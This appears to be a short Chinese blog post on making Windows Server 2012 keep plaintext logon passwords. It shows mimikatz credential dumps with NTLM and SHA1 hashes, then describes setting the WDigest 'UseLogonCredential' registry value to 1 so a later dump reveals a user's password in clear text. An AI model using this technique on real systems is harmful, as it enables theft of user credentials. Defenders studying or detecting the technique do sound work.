windows 2012 抓明文密码方法

默认配置是抓不到明文密码了,神器mimikatz显示Password为null

Authentication Id : 0 ; 121279 (00000000:0001d9bf)

Session : Interactive from 1

User Name : mickey

Domain : WIN-B054LAOH5FC

Logon Server : WIN-B054LAOH5FC

Logon Time : 2014/2/7 16:13:37

SID : S-1-5-21-3697557613-2315859964-140861748-1001

msv :

[00000003] Primary

* Username : mickey

* Domain : WIN-B054LAOH5FC

* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709

[00010000] CredentialKeys

* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709

tspkg :

wdigest :

* Username : mickey

* Domain : WIN-B054LAOH5FC

* Password : (null)

kerberos :

* Username : mickey

* Domain : WIN-B054LAOH5FC

* Password : (null)

ssp : KO

credman :

需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,就能记录到明文密码了。

Authentication Id : 0 ; 2506062 (00000000:00263d4e)

Session : Interactive from 2

User Name : mickey

Domain : WIN-B054LAOH5FC

Logon Server : WIN-B054LAOH5FC

Logon Time : 2015/5/11 11:47:35

SID : S-1-5-21-3697557613-2315859964-140861748-1001

msv :

[00010000] CredentialKeys

* NTLM : ad12521316a18d2172f20db07674c278

* SHA1 : 85b6b322a966fe19f758ee15fd7516c23c33cb7c

[00000003] Primary

* Username : mickey

* Domain : WIN-B054LAOH5FC

* NTLM : ad12521316a18d2172f20db07674c278

* SHA1 : 85b6b322a966fe19f758ee15fd7516c23c33cb7c

tspkg :

wdigest :

* Username : mickey

* Domain : WIN-B054LAOH5FC

* Password : AGeisNBVeryNB@wooyun.org

参考链接:http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html

[原文地址]

posted @ 2016-01-23 17:44  h4ck0ne  阅读(694)  评论(0编辑  收藏  举报